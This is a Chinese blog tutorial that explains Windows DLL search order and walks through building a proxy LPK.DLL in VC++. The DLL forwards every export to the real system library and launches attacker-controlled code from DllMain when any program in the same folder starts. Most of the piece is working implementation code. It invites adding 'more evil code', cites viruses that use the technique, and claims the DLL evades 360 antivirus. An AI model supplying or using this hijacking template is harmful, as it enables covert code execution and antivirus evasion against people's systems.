DLL劫持技术详解(lpk.dll)

说起DLL劫持技术,相信大家都不会陌生,因为这种技术的应用比较广泛,比如木马后门的启动、破解程序的内存补丁、外挂插件的注入以及加密狗的模拟等。之所以DLL劫持技术深受黑客们的喜爱,主要是因为该技术可以有效的躲过大部分杀软,并且实现起来技术难度不大。DLL劫持技术也不是什么新技术,记得在《Windows核心编程》中也有提及相关技术。可是对我们广大初学者来说,DLL劫持技术就显得很神秘了,本系列教程将向大家详细讲解什么是DLL劫持、DLL劫持的形成原因及原理、最后还会以实例向大家讲解如何通过编程实现DLL劫持。

●背景知识●

首先我们要了解Windows为什么可以DLL劫持呢?主要是因为Windows的资源共享机制。为了尽可能多得安排资源共享,微软建议多个应用程序共享的任何模块应该放在Windows的系统目录中,如kernel32.dll,这样能够方便找到。但是随着时间的推移,安装程序会用旧文件或者未向后兼容的新文件来替换系统目录下的文件,这样会使一些其他的应用程序无法正确执行,因此,微软改变了策略,建议应用程序将所有文件放到自己的目录中去,而不要去碰系统目录下的任何东西。
为了提供这样的功能,在Window2000开始,微软加了一个特性,强制操作系统的加载程序首先从应用程序目录中加载模块,只有当加载程序无法在应用程序目录中找到文件,才搜索其他目录。利用系统的这个特性,就可以使应用程序强制加载我们指定的DLL做一些特殊的工作。
举个例子来说吧,Windows的系统目录下有一个名为LPK.DLL的系统文件,程序运行时会在c:\Windows\system32文件夹下找到这个DLL文件并加载它。如打开记事本程序,用360的进程管理工具可以显示记事本进程加载的所有模块,如图1所示。

图1 记事本加载的所有模块
 
可以看到记事本加载了c:\Windows\system32\LPK.DLL。

●什么是DLL劫持●

根据前面说的Windows资源共享机制,操作系统加载程序首先从应用程序目录中加载模块。这一特性在注册表中也有体现:HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode,如果为1,搜索的顺序为:应用程序所在目录->系统目录(用GetSystemDirectory获取)->16位系统目录->Windows目录(用GetWindowsDirectory获取)->运行程序的当前目录->PATH环境变量,如果为0,搜索顺序为:应用程序所在目录->运行程序的当前目录->系统目录(用GetSystemDirectory获取)->16位系统目录->Windows目录(用GetWindowsDirectory获取)->PATH环境变量。Windows Server 2003默认值为1,Windows XP/2000默认值为0或者没有这个键值。但是不管是哪种情况,第一个搜索的肯定是应用程序的所在目录,这样就有机会让应用程序去加载我们的DLL。如果这个DLL和系统目录下的某个DLL同名,导出表也相同,功能就是加载系统目录下的那个DLL,并且将导出表转发到那个真实的DLL。这时DLL劫持就发生了。可以看出,构造一个符合上面要求的DLL,再将其放在可执行文件的目录即可轻松实现DLL劫持了。

●DLL劫持的实现●

这一步我们的工作就是通过编程来实现一个LPK.DLL文件,它与系统目录下的LPK.DLL导出表相同,并能加载系统目录下的LPK.DLL,并且能将导出表转发到真实的LPK.DLL。可以看出我们要实现的这个DLL需求如下:
1、构造一个与系统目录下LPK.DLL一样的导出表;
2、加载系统目录下的LPK.DLL;
3、将导出函数转发到系统目录下的LPK.DLL上;
4、在初始化函数中加入我们要执行的代码。
我们使用VC++来进行开发,首先是定义导出函数。核心代码如下:


#pragma comment(linker, "/EXPORT:LpkInitialize=_gamehacker_LpkInitialize,@1")
#pragma comment(linker, "/EXPORT:LpkTabbedTextOut=_gamehacker_LpkTabbedTextOut,@2")
#pragma comment(linker, "/EXPORT:LpkDllInitialize=_gamehacker_LpkDllInitialize,@3")
#pragma comment(linker, "/EXPORT:LpkDrawTextEx=_gamehacker_LpkDrawTextEx,@4")
#pragma comment(linker, "/EXPORT:LpkExtTextOut=_gamehacker_LpkExtTextOut,@6")
#pragma comment(linker, "/EXPORT:LpkGetCharacterPlacement=
_gamehacker_LpkGetCharacterPlacement,@7")
#pragma comment(linker, "/EXPORT:LpkGetTextExtentExPoint=_gamehacker_LpkGetTextExtentExPoint,@8")
#pragma comment(linker, "/EXPORT:LpkPSMTextOut=_gamehacker_LpkPSMTextOut,@9")
#pragma comment(linker, "/EXPORT:LpkUseGDIWidthCache=_gamehacker_LpkUseGDIWidthCache,@10")
#pragma comment(linker, "/EXPORT:ftsWordBreak=_gamehacker_ftsWordBreak,@11")

以上是导出表中的函数,LPK.DLL比较特殊,在导入表中有一项不是函数是数据,因此数据这部分要单独处理。核心代码如下:


EXTERNC void __cdecl gamehacker_LpkEditControl(void);   
EXTERNC __declspec(dllexport) void (*LpkEditControl[14])() = {gamehacker_LpkEditControl};  

LpkEditControl这个数组有14个成员,如上定义即可,后面我们还需要将真正的数据复制过来。
加载系统目录下的LPK.DLL。核心代码如下:


 inline BOOL WINAPI Load()
 {
  TCHAR tzPath[MAX_PATH];
  TCHAR tzTemp[MAX_PATH * 2];
  
  GetSystemDirectory(tzPath, MAX_PATH);
  lstrcat(tzPath, TEXT("\\lpk"));
  m_hModule=LoadLibrary(tzPath);  
  return (m_hModule != NULL); 
 }

在代码中可以看到,使用LoadLibrary方式加载系统目录下的LPK.DLL。加载完成后就要实现导出函数的转发了,这步是很关键的。
首先要获得原函数地址。核心代码如下:


 FARPROC WINAPI GetAddress(PCSTR pszProcName)
 {
  FARPROC fpAddress;
  CHAR szProcName[16];
  TCHAR tzTemp[MAX_PATH];
  
  fpAddress = GetProcAddress(m_hModule, pszProcName);  
  return fpAddress;
 }

然后将我们构造的导出函数一一转发。核心代码如下:


ALCDECL gamehacker_LpkInitialize(void)
{
 GetAddress("LpkInitialize");
 __asm JMP EAX;
}

ALCDECL gamehacker_LpkTabbedTextOut(void)
{
 GetAddress("LpkTabbedTextOut");
 __asm JMP EAX;
}

ALCDECL gamehacker_LpkDllInitialize(void)
{
 GetAddress("LpkDllInitialize");
 __asm JMP EAX;
}

ALCDECL gamehacker_LpkDrawTextEx(void)
{
 GetAddress("LpkDrawTextEx");
 __asm JMP EAX;
}

ALCDECL gamehacker_LpkEditControl(void)
{
 GetAddress("LpkEditControl");
 __asm jmp DWORD ptr [EAX];
}

ALCDECL gamehacker_LpkExtTextOut(void)
{
 GetAddress("LpkExtTextOut");
 __asm JMP EAX;
}

ALCDECL gamehacker_LpkGetCharacterPlacement(void)
{
 GetAddress("LpkGetCharacterPlacement");
 __asm JMP EAX;
}

ALCDECL gamehacker_LpkGetTextExtentExPoint(void)
{
 GetAddress("LpkGetTextExtentExPoint");
 __asm JMP EAX;
}

ALCDECL gamehacker_LpkPSMTextOut(void)
{
 GetAddress("LpkPSMTextOut");
 __asm JMP EAX;
}

ALCDECL gamehacker_LpkUseGDIWidthCache(void)
{
 GetAddress("LpkUseGDIWidthCache");
 __asm JMP EAX;
}

ALCDECL gamehacker_ftsWordBreak(void)
{
 GetAddress("ftsWordBreak");
 __asm JMP EAX;
}

转发完之后不要忘记LpkEditControl哦,要将真实数据复制过来。核心代码如下:


 memcpy((LPVOID)(LpkEditControl+1), (LPVOID)((int*)GetAddress("LpkEditControl") + 1),52);  

好了,到这里整个DLL劫持基本就算完成了,也许你要问,那我们要执行的代码写在哪里?我的方法是将其写到初始化函数中。这样当DLL被加载的时候就会执行。下面看一下DLL的入口函数吧。


BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
 if (dwReason == DLL_PROCESS_ATTACH)
 {
  DisableThreadLibraryCalls(hModule);
  if(Load())
  {  
   memcpy((LPVOID)(LpkEditControl+1), (LPVOID)((int*)GetAddress("LpkEditControl") + 1),52);  
   _beginthread(Init,NULL,NULL);
  }
  else
   return FALSE;
 }
 else if (dwReason == DLL_PROCESS_DETACH)
 {
  Free();
 }
 return TRUE;
}

在这个函数中我们看到,当加载系统目录下的LPK.DLL成功后,进行了LpkEditControl数组的复制,并通过_beginthread(Init,NULL,NULL);定义了初始化函数Init,而这个初始化函数是由我们控制的。
下面在初始化函数Init中写入测试代码如下:


void WINAPIV Init(LPVOID pParam);
void WINAPIV Init(LPVOID pParam)
{
 TCHAR tzPath[MAX_PATH];
 TCHAR tzTemp[MAX_PATH * 2];
  wsprintf(tzTemp, TEXT("劫持函数运行了......."), tzPath);
   MessageBox(NULL, tzTemp, TEXT("gamehacker"), MB_ICONSTOP);
 return; 

我们用弹出一个对话框来检测一下劫持的效果,当然你也可以加入更加邪恶的代码。猫癣、犇牛等病毒都是利用DLL劫持技术破坏系统的。
看一下效果。将编译好的LPK.DLL复制到记事本相同目录,然后运行记事本程序。看看是不是弹出来可爱的测试窗? 
当然你也可以将这个LPK.DLL复制到任何程序的目录,只要该目录的程序一运行,就会执行我们的代码。如果代码的功能是连续弹出N个测试窗,我想一定会让人很崩溃。
DLL劫持技术的基本原理和简单实现就讲到这里了。在测试的时候发现360安全卫士并没有拦截我们的代码,看来利用DLL劫持是可以过360检测的。

posted @ 2014-12-09 09:49  程序员博客  阅读(13006)  评论(0编辑  收藏